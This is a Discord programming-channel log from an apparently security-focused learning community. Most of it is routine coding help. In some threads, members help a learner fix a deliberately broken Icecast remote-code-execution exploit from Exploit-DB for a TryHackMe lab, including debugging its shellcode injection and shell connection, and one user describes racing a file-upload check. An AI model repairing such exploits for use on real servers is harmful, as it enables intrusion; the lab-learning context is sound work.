#programming

and also get rid of a tab from that sad_mood with too many tabs :P

Hmm, now when I say "no" when I'm sad, I want it to terminate reading the code, and not send me to the error "just tell me the mood", how would I do that?

I thought it would be like end() or terminate() but nope

Yup! Did it 😄

Ah! It was exit()!

yea!

Now time to go to bed, thank you for the help 🙂

can also just return an empty value like 0 or something similar

all good!! goodnight 🤍

Nighty nighty ❤️

I strongly recommend against global variables. They generally cause issues down the line, especially when something else changes them.

Hello, not sure should ask here or not but please correct me. Is there any way or wordpress plugin to secure website from hackers.

There are some security plugins for wordpress

Have never tried them personally but they exist

Do they make you hackproof? Nope

Theres no 100% sure fire way of being hackproof

yeah, actually I can say I have used most known plugins like wordfence, ithemesecurity, sucuri but those didn't help much. Still hackers are able to get in. Only the wp cerber plugin was able to stop most of the attacks but that also removed from wp repository due to some security flaw which is actually not flaw as per plugin author

ithemesecurity consumes lot of memory and server space

I am always doing basics which is necessary to prevent attacks like changing login urls, disabling index of directories, hotlinking of images, spam words, disabling comments form if not required, disabling editor. But still need some more bullet proof solution

ah my bad, thanks for letting me know

Gave +1 Rep to @brazen eagle

You mean like a WAF?

Yes I think can say, after discussing with one of the tech support guy got slight info that hosting provider have to install some kind of firewall on server which can block such traffic before visiting the website.. but that is really not in hand in developer's

One of the hosting provider i have seen installed immune365 on server which was having great performance yet i have seen. Which was blocking ips which was having wrong failed attempts in wordpress

Ugh... global Variables D:

Is it possible to Code a race condition in Python? the webapp has a race condition where the file gets uploaded and makes some checks before it gets rejected. i have to GET the /upload/file.php endpoint in milliseconds. If i use the request lib it will wait to get response after uploading. How do i concurrently make requests?

threading?

There are different models of concurrency, with networking it can be much more complicated than just 1 concurrent unit per core.

found out that there is a library in python called httpx that makes asynchronous request calls.

it was not that complex, it was just a simple race condition. It worked in Burp repeater.

hi guys

i has some problem about pagination in reactjs. could someone help me just for few minutes :((

Describe problem and paste relevant code etc

does anybody have any experience with python yfinance Library? What is tickers in those? is it like a Short form of a company (AMZN for amazon) ?

Tickers will be the same everywhere, they're a common stock thing

Anyone good with website scraping in here?

beautiful soup

I am

But the pages aren't consistent. 😦

I'm wondering if there is a better way to use Bs4 than just use like the 3rd instance of a certain class on the webpage

oof

you could try parsing HTML for relevant content with perl, but that seems like also a lot of work

The best thing I've come up with is generating a list of valid locations and just searching for those 😦

hmm

locations as in DOM items or directories?

Do you have a specific question about it or just general asking?

Location:place on the planet

Inquiring as to see if anyone has skills that could give me a different take 🙂

Without context you're gonna struggle there.
Are you able to post a couple of examples from the dataset? Wouldn't be the first time there's been a very easy solution that just takes a fresh pair of eyes to see 🤷‍♂️

Under Location, I need to grab the country (china) here

Hm, I'd look at filtering spans with inner text "Location", then just do next sibling, personally

Did you say there were other formats?

Yeah, in some rare instances, location is empty

I think that's a great idea I'm gonna try that

Okay so that would just be a try/except

But yeah, if that tag is always going to be there, that's how I'd do it, personally

Actually, even if it's not always there, if it's there 99% of the time then I'd do it and just raise the non-conformant ones for manual review

Hey,
I am learning PyTorch and have a problem with my code and my question thread on stack overflow just got deleted without any answers, so anyone here can help me

I am using two different python files to train and test the model.
In my training file I train the model using GPU but when I try to load the model in my test.py file and set the device to cuda it gives me an error and even after reading the documentation of PyTorch still I have the same error, I can run the model without any error if I set the device to cpu in my test.py file.

this is the test file

device = torch.device('cpu') PATH = './trainedModel/mnist_cnn_net.pt' transform = trans.Compose([trans.ToTensor(), trans.Normalize((0.5,), (0.5,))]) class Net(nn.Module): def __init__(self): super(Net, self).__init__() self.conv1 = nn.Conv2d(1, 32, 3) self.conv2 = nn.Conv2d(32, 64, 3) self.pool = nn.MaxPool2d(2, 2) self.fc1 = nn.Linear(64 * 12 * 12, 128) self.fc2 = nn.Linear(128, 10) def forward(self, x): x = F.relu(self.conv1(x)) x = self.pool(F.relu(self.conv2(x))) x = x.view(-1, 64 * 12 * 12) x = F.relu(self.fc1(x)) x = self.fc2(x) return x net = Net() net.to(device) testset = torchvision.datasets.MNIST('mnist', train=False, download=True, transform=transform) testloader = torch.utils.data.DataLoader(testset, batch_size=128, shuffle=False, num_workers=0) #grab the model from the path net.load_state_dict(torch.load(PATH)) net.to(device) #declaring the iterator for test-sets and feeding them into the previously trained model testIter = iter(testloader) images, labels = testIter.next() print(next(net.parameters()).device) outputs = net(images) _, predicted = torch.max(outputs, 1)

there are no errors due to indentation I just removed the comments in discord that is why the forward function is outside the class

and if I set the device to cuda then I get this error
RuntimeError: Input type (torch.FloatTensor) and weight type (torch.cuda.FloatTensor) should be the same

You might have more luck asking in an AI discord

I am sorry if I sound desperate but I think i have a few hunded less hair then I began working with pytorch so I am asking in all the dev forums, and stackoverflow being stackoverflow just deleted my question as being repetitive.

Have you tried deep learning related discords? I'm not on any, but I know they exist

yes

Guys

How do I use one property of a component in a different component in Angular

WIthout using service.ts

not sure that you mean by that

by property you mean a field?

you can probably pass it via the standard ways, ie create a prop on the new component and pass the value. If they need to be shared, then a service is probably best though

Hello im new

hi new

JavaScript

I have the data

{
  _id: new ObjectId("63f68146f34ccbf1e84d713d"),
  userID: '270975958511517697',
  __v: 0
}

And I'm looking to append userID: '270975958511517697', to a list named "winners"

console.log(result.userID); // 270975958511517697
winners.push(result.userID);
console.log(winners); // []

Why doesn't it append "userID" to the array?

I know I'm probably missing something so obvious but am tired

Is Giveaway instantiated anywhere?

or is it a singleton object?

Giveaway is a reference to the schema

const Giveaway = require("../../events/mongo/schema/giveaway");

ok, so it' an interface into the backend db via ORM

It just randomly picks a field from the database, I then need the userID from the result

what's the output if you change console.log(winners) to console.log(winners[0])

my first thought is that it's some kind of type inconsistency or conversion by console.log

Returns undefined

I don't know what I did but it works

Not touching it

sounds like cache bullshit

Set timeout is pretty fragile if memory serves, if the bot crashes, you'll lose the giveaway, unless you reinitialize it at startup

btw you can order by rand() and then just findone()

to save yourself a query

In version 2, I’m making s much better error handler so the bot won’t crash when something happens, it will just dump

still need to make sure you can't pull a dupe

yeah but that's then and not now 🙂

That’s resolve, it’s just an issue with the timeout, I’m going out for someone’s birthday so I’ll have to fix it tomorrow

let me know when we're live and I'll set up a test run

Why doesn't global list = work? It gives me an error because I'm using "="

import random

def start():
    global list = ("rock", "paper", "scissors")
    RealAnswer = random.choice(list)
    print(RealAnswer)
    UserAnswer = input("Rock, paper, scissors, shoot! ")
    if RealAnswer == UserAnswer:
        print("FCK I LOST!")
    if UserAnswer != ("rock", "paper", "scissors"):
        print("Rock, paper or scissors?")
    elif UserAnswer != RealAnswer:
        print("Wrong!")

start()

1a. You should avoid using global variables. Most of the time, they're not necessary.
1b. There's no reason to be using global here, just remove the keyword and it'll be fine.
2. Avoid using list as a variable name in Python, as it's already the keyword to refer to that data type. It won't break anything here, but it could cause problems later.

wait now that I look at those if statements they also don't make that much sense

haha I realized I've been thinking the wrong way about rock paper scissors

with this set of if statements, there is no win condition. Even if the computer gets "Rock" and you submit "paper", the elif statement just prints wrong

and I'm pretty sure UserAnswer != ("rock", "paper", "scissors") doesn't do what you think it does

If users answer is not rock, paper or scissors, ask again

But I should put an input there and not print

you'd want to do something like if UserAnswer not in ("rock", "paper", "scissors"):

the line that you have is checking if UserAnswer is the tuple, not if it's in the list

there's an additional potential* problem with the logic of the conditional check. It's not necessarily a problem in python itself, although it's very common in OOP and imperative languages

!= means not equal to right?

https://youtu.be/bGBBZeI-8Rk

this would still be a problem - the paranthesis has a special construction and it's not a logical grouping as would be somewhat more intuitive

that was a typo on my part 😅

wait I'm being dumb I need to stop multitasking

in a lot of OOP and imperative languages, that x = y syntax is checking the reference of the variable, not the actual variable contents. Even if the contents are identical, there's still a non-zero chance of evaluating to false

i dont get it. != means not equal to.

So for me it makes sense, idk why it doesnt?

gonna let juun take this one, I'm late for a meeting

In which case it will always evaluate to true. What is () actually constructing?

Its holding the list together

If I remove the () after != it gives me the error that "," is not supposed to be there

this is supposed to be python, right? You should re-read the Python Data Structures Documentation

I just dont get what you mean.

Like I said, if I remove the () like you want me to it gives me an error

That's not what I said to do

What did you mean by

"What is () actually constructing?" then?

I'm saying it's problematic to use () and you are refusing to go to the references I gave you to figure out why

my bad for telling u to use global variables! like an00b said they're rarely necessary + they can cause a lot of issues.

comparators like != or == check if both arguments are the same

what you're looking for is "not in" instead of !=

o wait an00b already said that woops

import random

def start():
    rockpaperscissors = ("rock", "paper", "scissors")
    
    RealAnswer = random.choice(rockpaperscissors)
    print(RealAnswer)
    
    UserAnswer = input("Rock, paper, scissors, shoot! ")
    
    if RealAnswer == UserAnswer:
        print("I drew!")
    elif UserAnswer != RealAnswer and UserAnswer in rockpaperscissors:
        print("I didn't draw!")
    elif UserAnswer not in rockpaperscissors:
        print("Invalid answer\n")
        start()
        
start()```

you probably want something like this yea?

if you want real rock paper scissors you'd have to do some use something like this:

import random

def start():
    rockPaperScissors = ("rock", "paper", "scissors")
    
    randomAnswer = random.choice(rockPaperScissors)
    print(randomAnswer)
    
    userAnswer = input("Rock, paper, scissors, shoot! ")
    
    if randomAnswer == userAnswer:
        print("Draw!")
        
    elif userAnswer == "rock":
        if randomAnswer == "scissors":
            print(userAnswer + " beats " + randomAnswer + "!")
            print("You win!")
        else: 
            print(randomAnswer + " beats " + userAnswer + "!")
            print("You lose!")
    
    elif userAnswer == "paper":
        if randomAnswer == "rock":
            print(userAnswer + " beats " + randomAnswer + "!")
            print("You win!")
        else: 
            print(randomAnswer + " beats " + userAnswer + "!")
            print("You lose!")
    
    elif userAnswer == "scissors":
        if randomAnswer == "paper":
            print(userAnswer + " beats " + randomAnswer + "!")
            print("You win!")
        else: 
            print(randomAnswer + " beats " + userAnswer + "!")
            print("You lose!")
                
    elif userAnswer not in rockPaperScissors:
        print("Invalid answer, try again!\n")
        start()
        
start()```

imo u should try learning all the basic concepts with a site like sololearn or something before trying to make things like this

That code needs a lot of work

sorry im still pretty new to python

n i left it kinda simplistic to be more easily understood too

Fair enough

One major thing I would say is have a look at f-strings instead of joining the strings together, juun posted a nice article about performance with all the methods ago

yee i was gonna use them but i didnt wanna confuse sxdtune

https://grski.pl/fstrings-performance.html is this the article?

I cannot stress enough that everyone posting code in this rock scissors paper discussion go read the docs and python data structures from the official docs source, specifically focusing on the differences between lists and tuples

hey so, C newbie here, but i made a custom function related to adding to a pointer array (double ptr), and i'm encountering a weird bug. if i do len+1000 it goes away, but len+2 (which seems logical), and heck, even len+100 for that matter, it somehow doesn't allocate enough memory which thusly causes a later called calloc to overwrite this needed memory with 0's. is there any explanation as to why? here's my code

int doubleptrlen(char** ptr) {
    int len = 0;
    if(ptr != NULL) while(*(ptr+len) != NULL) len++;
    return len;
}

char** ptrcat(char** ptr, char* to_add) {
    //create a new ptr (plus 2, since null term and the item we want to add)
    //copy old ptr values into new ptr
    int len = doubleptrlen(ptr);
    char** new_ptr = calloc(len+2, sizeof(char*));
    for(int i = 0; i < len; i++) {
        new_ptr[i] = ptr[i];
    }
    new_ptr[len] = to_add;

    //free the old ptr and return the new ptr
    free(ptr);
    return new_ptr;
}

i assume something's terribly wrong here but i genuinely have no clue what

double has a specific meaning in C/C++. Do you mean a pointer to a pointer (which is called a 'handle'), or doing arithmetic on the double precision floating point primitive type?

ptr to a ptr

hence double ptr haha

Right, but it's also a specific data type. It's really bad practice and style to name stuff like that.

fair enough

Also good practice to use braces even for single line statements inside an if or while. Spacing things out makes the code more readable, and the braces help avoid confusion over developer intentions

There's something wonky in the logic between the two fonctions though

Shouldn't you be allocating the inner pointer?

Then returning the address of

yeah fair enough; i just figured it was short enough to do this but ill keep that in mind moving forward

wdym?

you're trying to allocate the outer pointer

new_ptr?

wait

unless I'm missing something

which is possible

so ptr starts off as null

len=0 so for loop shouldnt do anything

free(null) doesn't really cause much errors though i do think now it should be checked for null

that should be fine

its something with calloc() for the new_ptr var

yeah but there's a mismatch between your len and the pointer allocated

because i do think the next calloc causing the behavior mentioned above highly indicates its not enough allocated memory but i just dunno why

yeah fair

i tested the results and len is as expected

if the double ptr has 2 ptrs in it it returns 2

for ex

len is the length of the inner pointer, ye?

im sorry but im a complete newbie so could you explain what inner/outer are lol

you have a pointer to a pointer

yeah

outer pointer points to the inner pointer

ohhhh

okay

just a label so I can follow along 🙂

len is the length of the outer pointer then

sort of

dunno what the technical term is

its like array.length or smth

designed to act that way

and again it works as i expect it to but then again idk

yeah but your doubleptrlen is dereferencing the outer pointer

yeah

and is giving the length of the inner

it basically does [doubleptr][something]

if that value is null it means the array is over

yeah

is the logic there flawed?

so you're allocating the len of the inner pointer + 2

to new_ptr

len(to_add) != 1 necessarily

ok I see now, you're doing a shallow copy

yeah

but you'll probably want to add len(to_add) + 1 rather than 2

or perform a deep copy

question but

since everything is in context of sizeof(char*), shouldn't [amount_of_ptrs_in_array]+2 be enough to fit 2 more elements? (null term and new element)

again sorry im very new to C

so like

im missing something there and i just cant comprehend

yeah but you're dereferencing

but I may be missing something as well

pointers are weird

I assume you're trying to concatenate two strings

doing *(ptr+len) only derefs temporarily though so it shouldnt be too big of a deal i think?

yeah that should be fine

like if the array is [something,something,null] it'll count the 2 somethings until it reaches null

yeah

the len function looks fine

alr

its not concatenating two strings too but rather something like arr.append(c) in python

why not use strcat?

or do you not have stdlib?

strcat doesnt work for string arrays tho? (atleast to my knowledge)

its for like

works on char*

yeah

ah

sorry also

ok

by string array i mean an array OF char*

i shouldve clarified

array of strings then yeah ok

i keep forgetting this is c lmao

then you don't care about the inner string length

yeah

exactly

just outer array

ah ok

you aren't getting the length of the outer array in your len though

oh?

I have two files, models.py:

from sqlalchemy import Boolean, Column, ForeignKey, Integer, String
from sqlalchemy.orm import relationship

from database import Base

class Pasta(Base):
    __tablename__ = "pastas"

    id = Column(Integer, primary_key=True, index=True)
    name = Column(String, unique=True, index=True)
    description = Column(String, index=True)

and schemas.py:

from pydantic import BaseModel

class PastaBase(BaseModel):
    name: str
    description: str | None = None

class PastaCreate(PastaBase):
    pass 

class Pasta(PastaBase):
    id: int
    
    class Config:
        orm_mode = True

I tried reading information about how the class models work and how they are integrated. My initial thought is that in models.py, this is created as a Table Object to create some relation with the database tables and with the Python code. Now from here, what I don't understand is in the PastaBase(BaseModel). Am I basically creating a base model of the Table Object I have from models.py like name and description?

Here is the Github link if need more information of how it all works: https://github.com/Mknukn/pastapi

Appreciate any and all resources that can point me in the right direction

you're getting the length of the first string

not rlly

atleast i think

it kinda iterated through it (assuming not null) and stops counting at nullbyte

again it works and prints out len(str_arrarr) when doing printf

but

hmm

like if theres 2 str arrays in there it'll print 2

oh wait

?

are you trying to reuse ptr later?

no

outside the function?

it gets replaced

i thnk

x = ptrcat(x,input)

you should free it in the same scope it gets alloced

like in the func?

hang on let me think here, haven't done C in a while

no worries; i appreciate you helping

been driving me nuts haha

(the bug not you)

yeah I can imagine

this is the bug location

array of char* is fine but then most elements are replaced by 0 after this calloc

which is where i got the theory that the ptrcat somehow overwrites memory it technically isnt solidified in owning

by insufficient memspace allocation

or that free is causing issues

and you have a use-after-free

maybe

it also like

it doesnt get overwritten when i do len+1000

idk if that means anything

like it works fine but thats a bit of a hacky approach lol

prob not the best

you renamed a few things since

?

the screenshot doesn't seem to match the code posted earlier

its a different place in the code

like outside the func

I assume it's calling the func?

no no

so like

or is it emulation_list being silly?

emulation_list has all the correct values up until calloc

and looking at my code it made me realize its likely ptrcat not doing an enough-size thing

calloc zero-initializes

thus this calloc thinks actually used parts of memory are free to use and zeroes them

yeah

its the only other alloc that occurs after ptrcat does its thing

doubt it's calloc itself acting up though

yeah

its likely my end

with ptrcat

since this calloc looks fine

how is ptrcat used?

then after this while loop crypted_fnames is returned

this is what creates emulated_list

its within a function

yeah ok

DECRYPTED_FNAME is constant?

yes

its at 101 iirc

that should be fine

cause the actual size of ep->d_name wont exceed 100

plus 1 for nullterm

I feel that there should be a deep copy done for ep->d_name

wondering if there are other things being freed behind your back

thats when i kinda just recreate the char** array right?

i mean i could try that

not entirely sure about what I'm saying here tbh, this is mostly gut feeling

i mean im out of options

so i might aswell

hmm

have you stuck a debugger on the thing?

weird so

the deep copy did fix it i think?

i removed free for debugging

its likely erroring out because one of the elements is a const char*

my gut feeling is that you inversed the two...

but I don't know how that framework works

try adding it back again

see what happens, one change at a time

wait

maybe its because closedir like

frees the ep stuff too

that's likely

so ep->dname is freed

that's what I was thinking

after seeing the code there

aha

:)

that was what did it

😎

cool

lets gooooo W

so pro tip when debugging, use very small steps

change only one thing at a time and retest

that way you can more easily isolate the fix

fair enough

though sometimes it's a combination of things 🙂

I got it from following the sql tutorial

https://fastapi.tiangolo.com/tutorial/sql-databases/

ah, hmm

im reading through the docs but alot of the concepts are going over my head

oh I see... I think

not sure exactly what pydantic does but yeah ok

the models bit interacts with the database, looks like an active-record type pattern

or not quite

yeah ok strike my last

for the classes you showed, the models set is for interacting with the database, the other set is for interacting with the API

AH

I understand it way better now!!!

👍

still a bit lost but now i understand it from a different perspective

glad I could help

last question why is the id: int inside the class Pasta(PastaBase) and not PastaBase(BaseModel) ?

base model doesn't care about the id, mostly for the Create data

what is sql?

super ql language 😉

https://en.m.wikipedia.org/wiki/SQL

Sooo, @inner hedge, give me a second to type whaha.

It does not work, because:

When you use read to get a variable, the user has to enter it while the program is running.
Example:

#!/bin/bash
# -n does not append a newline
echo -n "Hello friend, enter your message: "
read variable
# Notice how there is no prompt here? read cannot print one, you have to do this with echo
```This script will create a prompt like this:

$ ./script.sh
Hello friend, enter your message:

The approaches you went with are using pipes:

echo "something" | ./script.sh

Which you will have to handle with a loop like so:

#!/bin/bash
while read line; do
  echo "reading: ${line}"
done < /dev/stdin

And the other solution you came up with were parameters like:

./script.sh "param1" "param2"
```Which you need to handle like this:
```bash
#!/bin/bash
# Print the first parameter
echo $1
#Print the second parameter
echo $2
# And so on...

Hope this helps.

If you want to use parameters better, I recommend you look up 'getopt in bash'.

wonderful, thank you so much for your time and explanation.@cosmic mason

Gave +1 Rep to @cosmic mason

Always happy to help.

This is for a THM room, right?

yep

Please use the appropriate room help/hints channels for TryHackMe rooms

yes, but I don't want hint, I'm just trying to figure out a new way to exploit using some commands and programming logic of the script. @onyx merlin

It's room related, and what you've just described is a hint

Hello world, I have a question so I am currently learning python and I want to create a program. I am interested in malware analysis, I want to create malware and test it in the sandbox but I’m just wondering what would be the easiest malware to start with?

@pine cypress

We only do "malware talks" in #exploit-and-mal-studies which is an advanced channel you would have to unlock first.

How do I unlock it?

step 1 verify
step 2 get any of the certs or reach level 0xD on tryhackme site or do throwback on tryhackme site

!docs verify

What level is 0xD?

13

Yea I found it lol, I’m halfway there. Time to get to work. Thanks

I'm compiling this C source code and I'm getting so many errors:
[source: https://www.exploit-db.com/exploits/568]

Starting with this one about "arn" :

What kind of data structure does this create in C?

It's 32 different strings is it not? Including "xcc"

It doesn't create a data structure.

do you know what it does?

or is it wrong?

Because the compiler is giving an error

Some questions to investigate: What is a preprocessor command?

How does C standard specify white space should be treated?

Which version of C are you expected compile with? Which version of C are you actually compiling with?

And I'm assuming I would have to compile it differently since it's giving an error? Or that is just not right?

Yea that snipet just aint valid C code.

I tried -ansi for C89 and it was the same error.

I've given you a bunch of stuff you need to learn, so you can determine what needs to be fixed and why

I'll look thanks

Im also not sure if they meant to define the get request like that, but usually you do a \r\n not just rn

I wasn't expecting to fix someone else's code if it's wrong?

I'm tearing my hair off the whole day.

I looked in room help and a handful of people have issues with getting this exploit to compile

So I guess I'm learning C today.

One major thing you'll learn while using exploid-db is that many exploits are deliberately broken.

Oh that makes sense.

That explains quite a lot actually, lol

yeah it makes sense. Thanks.

Firestore is showing limit exceed and unable to access it through console
https://stackoverflow.com/questions/75633304/quota-limit-exceed-firestore

@umbral pelican

I did it.

it compiled.

This whole thing was like a little puzzle lmao

The compiler errors gave all the answers too it was like "Did you mean so and so" and I'm like oh yes that's what I meant and I just spaced out words that were together and stuff.

Also moved a block of code into a #ifdef block

Can't believe I did this it's freaking awesome. I can't ping juun over this stupid stuff but next time I see him(her? them?) I'm going to tell them about it

kek

good job

oh hey! Thanks for telling me about how the compile failure is meant to be that way.

I gave up a bit but I went back to it this evening and I was able to get it.

hello, I have a problem that os.getcwd() gives me where my script is actually located, not where i am calling it from ( I made the script able to be executed from different locations by putting an executable in /usr/bin that launches the script).
How can I get the location where the script is being called from, not where it is ?

That doesn't seem to be true.

output_dir = os.path.dirname(args.output)
                        if output_dir:
                            # args.output is a full path
                            print("path now is: " + args.output, "and the cwd is: "+ os.getcwd() + "the os.path.abspath(__file__) is " + os.path.abspath(__file__))
                            pass
                        else:
                            # args.output is just a filename, so we use os.getcwd() as the directory
                            args.output = os.path.join(os.getcwd(), args.output)
                            print("path now is: " + args.output, "and the cwd is: "+ os.getcwd() + "the os.path.abspath(__file__) is " + os.path.abspath(__file__))
                        with open(args.output, 'w') as f:
                            for word in generate_wordlist(args.min_length, args.max_length, args.charset):
                                f.write(word + '\n')
                        print("wordlist generated in " + args.output)

the prints were added for debugging

it's doing exactly what your telling it to, im a bit confused

say I called the tool from /home/user/some_dir
I want os.getcwd() to return /home/user/some_dir, and not /usr/share/ktool/src (this is where the tool is installed)

or just anyway to get the location where the tool is being used from

the whole point of this is if the user gives -o somefile as output file, it should put it in the same directory he is using the tool from

....but os.getcwd() gives you that?

can you show me how your running it?

and this is how it gets installed in the first place:
sudo ./setup.py

#!/usr/bin/env python3

import os
import shutil

KTOOL_DIR = '/usr/share/ktool'
BIN_DIR = '/usr/local/bin'


def install_ktool():
    try:
        print('[+] Installing ktool to {}...'.format(KTOOL_DIR))
        shutil.copytree('.', KTOOL_DIR)
    except Exception as e:
        print('[-] Error installing ktool:', e)
        return

    try:
        with open(os.path.join(BIN_DIR, 'ktool'), 'w') as f:
            f.write('#!/bin/sh\n')
            f.write('cd {}\n'.format(os.path.join(KTOOL_DIR, 'src')))
            f.write('python3 ./ktool.py\n')
        os.chmod(os.path.join(BIN_DIR, 'ktool'), 0o755)
    except Exception as e:
        print('[-] Error :', e)
        return

    print('[+] Ktool installed successfully!')


install_ktool()

ah, I see your mistake

f.write('cd {}\n'.format(os.path.join(KTOOL_DIR, 'src')))

You see this? Whenever your running the tool, your making the current directory KTOOL_DIR

Also, please, please look into proper installation via pip - like I mentioned earlier poetry is a fantastic choice :)

thx I replaced that with this and it worked

f.write('python3 {}\n'.format(os.path.join(KTOOL_DIR, 'src', 'ktool.py')))

Gave +1 Rep to @surreal bronze

I think they missed the point ...

you seem to be mis-using setup.py a bit - https://docs.python.org/3/distutils/setupscript.html

I don't think I am even using this library, It's just a name setup.py

I'll probably be adding some c++ at some point

setup.py is the pythonic way of including distribution utilties and procedures for a python project

does it have to be made in a specific way?

It's standardized. There are plenty of properly formatted examples and documentation written on it. The link above is a good place to start, if you want to start thinking about how to let other people use the program you wrote.

@bleak hollow hi weißt du noch wer ich bin

@bleak hollow Kannst du meine Freundschafts anfrage annehmen ?

@magic falcon

So I just ran the rce exploit that I compiled last night and I am getting a segmentation fault

I have a page open that talks about some ways of getting segmentation fault and one is if a null pointer is being dereferenced

In the source file I am seeing this:

u_char *pointer=NULL;
...[other code here]...
pointer =strrchr(buf,0xcc);

Would that strrchr() assignment be dereferencing the null pointer? Or would that be with *pointer = ...

Here is the example of dereferencing a null pointer that leads to segfault.

I'm assuming it's not dereferencing a null pointer in the code snippet of the source file since it's not *pointer=... with a * in the front of the variable?

this server is english only, please

np

Hi, does someone here know where i can find some free programming courses for C#, C++

honestly freecodecamp as always

Freecodecamp only has js and python

istg i saw C++

wait

https://www.youtube.com/watch?v=8jLOx1hD3_o&t=70367s

?

they have on youtube

Hmm

The basics are known

try TheCherno c++ series

Aight thanks

Gave +1 Rep to @timber fable

So I took off the NULL initialization and just left it as a declaration u_char *pointer; and I still get segmentation fault error.

I have to look a bit more into C

Okay so assignment to a null pointer is not dereferencing so this is isn't the issue

segmentation fault is gone!!

but when connecting to the server with nc on the port where the shell is meant to be set up, I get a connection refused

Maybe I didn't modify the right code line and nothing was planted. But it doesn't seem to do anything with the programming so maybe its nc related

Connection refused has a very specific meaning, and it's not on the client (netcat) end

Look into the firewall on the target, but chances are the program is not actually listening for a connection

what was causing segfault and how did you fix?

Okay so probably I didn't fix the code mistake. Thanks

Gave +1 Rep to @onyx merlin

I haven't fixed it as it should be. I did strcpy(&pointer, string) but I don't think that's how it's supposed to work.

because I also did strcpy(buf, string) and that was also wrong in the code flow of the program lol

So I know a lot more now. I'm going to malloc the pointer enough to fit the string I'm copying and see if that memory error disappears.

are we allowed to ask for code reviews here?

is it for professional or school work?

personal project im working on

for my own (and others) use

you can ask, then

rep @hollow delta

lmao?

oof It didn't work. I definitely narrowed it down to the call to strcpy strcpy(pointer,shellcode); causing the segfault error.

because when I use &pointer the segfault disappears and I run it but of course the payload doesn't work meaning it's wrong.

Im not an expert (far from it), but I see your arguments changing, at some point you were sending the function address of the pointer, tho it should be just the pointer pointing at the start of a string.

char *strcpy(char *destination, const char *source);

So to use the function properly you should be giving it two initialized pointers pointing to strings (so non-null pointers), or simply sending two strings

Yeah pointer I allocated the size of the char array shellcode using malloc and for the const char *source I used the array of characters shellcode. And I get a segfault

I'm just trying a bunch of different things at this point but it's all the same a Segfault

Could you send me the code or that part so I can compile if its not too big and debug it?

How much programming should i know for networks/cloud/iot

i'm pretty sure there's enough, but how do i improve my skills

yeah it's https://www.exploit-db.com/exploits/568

So far only know some Python/C/C++ but anything new is fine too

Did you notice this?

#define BUFFSZ2048 

missing space

@lilac holly yeah I fixed all the compilation errors

The strcpy(pointer, shellcode) line is the last location where pointer is used. It's meant to copy the shellcode payload into the address of 0xcc where the byte occurs and where the pointer is pointing to, which is where the code execution breaks in the malformed http request, and that's where the shellcode is mean to be injected.

Im not 100% but are you sure system is allowing you to access the memory at 0xcc?

I mean how would I make sure of that?

It's a remote system and its running icecast on port 8000 and this last task for the Ice room is supposed to let us bypass using metasploit and instead use exploit files.

I moved the xcc into here I'm assuming that's what I needed to do:

Did that work?

with pointer =strrchr(buf,0xcc); pointer points to the address of 0xcc where it occurs after the request hits the server and that's where strcpy.. happens

I've had it like that this whole time and I think that's how it's meant to be.

Ok so

the last occurrence of pointer is with the strcpy line and I'm assuming that pointer isn't meant to be anywhere else since it writes to the memory address I mean that's what pointers do right?

You are using strrchr to search for 0xcc in buf, and if its not found pointer becomes NULL, then using NULL pointer in strcpy can cause issues

and buf cointains chars from EXEC

After this line:

pointer =strrchr(buf,0xcc); 

check if pointer is null, add printf line or whatever and see if its null, if it is, there should be your issue

@lilac hollyI think I menaged to recreate the issue and yes, the pointer is null and you were deferencing null pointer in strcpy

but is it dereferencing even if I don't do *pointer and just pointer

if it's pointer = chararry[] would that be passing chararray's memory address into pointer?

I'm a bit confused there

pointer = chararry
charry is a string

yeah

Yes it would be giving address of chararry to pointer (means pointer points at start of chararry)

so would pointer store the starting address of charrray?

^^

ok

and so for pointer seeing how it's the last occurrence of pointer with strcpy, would that mean that it would be used in the program and it would just need to point to the start address of the shellcode for the shellcode to execute?

like having pointer just be declared and store the shellcode address would mean that the shellcode payload should be executed?

No idea about shellcode

but if you wanna do that just do pointer=shellcode;
and it would point at start of shellcode

but idk if thats what you are trying to do with full code

I'm just assuming that since pointer points to the address where the shellcode is that it being in the program would mean that it would be computed by the CPU?

Most likely not if I remmeber my last lecture correctly. Considering strings are big memory blocks it would be way too expensive for registers in CPU to work with pieces of string at the time, therefore registers just move address of the string block around and work with that

Im asking like if I don't have to pass pointer to anything and that it being there is enough to signify to the program what to do since it works with memory addresses directly?

also look

I output the value of pointer using %d and %c and its 0 for both

and then when I dereference it

Yeah, you are not allowed to send null pointer in functions like strcpy

Its literally trying to move zeroes and ones from one place to nowhere/void

Which is undefined behavior

I dereference and I even changed scrpy first argument to getting the address of pointer to isolate segfault from that line since I get segfault with strcpy(pointer,..) there and yeah

Now you sent null pointer to printf func

I guess it's getting NULL then

after pointer=strrchr()..

So I guess that's why segfault is happening because of strrchr more specifically not finding xcc anywhere?

segfault is happening becuase you keep sending null pointer to functions (even if you were to comment out strcpy in your last iamge you would get segfault because of printf) to send pointer address and not what is pointing at. Use &pointer to send address of pointer.

Also yes pointer is given NULL value from strrchr because after strrchr fals to find 0xcc in the provided string it returns NULL. Also even before strrchr you initiliazed pointer with NULL, so its pointer in your program is always null from the start

(sorry for messy writing)

yeah I changed that initialization to

Ok now pointer is showing to some new memory block at heap

and I guess it has some address. I highly suggest to always check your pointers for null

if(pointer=NULL)
{
    printf("error");
}
else
...

smth like that

let me add that

after every memory allocation and usage like this "pointer=some_function_that_can_return_null()"

actually taht wouldnt even hit printf wouldn't it since if it's null it's null and so segfault since dereferencing a null pointer

pointer==null

my bad

oh I don't have to dereference it to see if its null?

That should work if I recall

okay let me try

yeah it works okay

It says pointer is NULL

yea

I changed 0xcc to "cc" and even "xcc" and I dereferenced and it says 99

make it printf %x

so its in hex

ok

I mean if you want to know at what address its pointing

"" double quotes gives me null

"xcc" gave you null?

do you have xcc in your string?

yeah in buf at the end

should work then, works for me

when I do 'c' it's fine and it gives me the character value c.

no no, just do pointer

Shouldnt I be doing just pointer and not &pointer

yeah okay

&pointer is address of the pointer

pointer is address to which pointer is pointing at

yeah

okay so I'm definitely getting an address

of course different everytime since I'm assuming ASLR

can you inject the code by simply doing it like that?

with 1 c

it would point to second to last c in string

I mean it IS saying c

you could also do pointer-1
(pointer arithemtic)

that would point to start of xcc in string

okay let me try it

I hope this manipulation is right.

The exploit is broken on purpose so it won't be easy for bad hackers to use it

"script kiddies" (please no one shoot me)

Not sure about that,

But I think I got the idea, you are trying to put in shellcode at the end of xcc so it will cause some error/bug or whatever

yeah thats what the comments say

also check your shellcode printf("%s");

You might be not injecting the whole of it but just "xEB"

Thats what I was thinking but theres no compilation error for multiline character arrays

